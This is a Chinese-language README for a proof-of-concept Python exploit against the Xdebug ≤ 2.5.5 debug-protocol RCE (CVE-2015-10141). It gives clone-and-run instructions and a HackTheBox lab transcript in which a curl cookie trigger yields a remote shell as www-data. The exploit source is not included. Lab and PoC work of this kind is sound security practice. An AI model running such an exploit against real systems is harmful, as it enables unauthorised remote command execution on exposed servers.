针对 Xdebug ≤ 2.5.5(CVE-2015-10141)的自定义 Python 漏洞利用程序。
本仓库包含我针对 Xdebug 远程代码执行漏洞(版本 2.5.5 及更早版本)的概念验证(PoC)漏洞利用程序。
该脚本利用端口 9000 上暴露的未授权调试协议来实现远程命令执行。
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py
出现提示时,输入托管 Xdebug 的目标 IP 地址。
来自我最近的 HackTheBox Olympus(中等难度)报告的演示:
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data
本项目仅用于教育目的。
请勿在未经明确授权的情况下将此漏洞利用程序用于任何系统。对于该代码的任何滥用行为,我概不负责。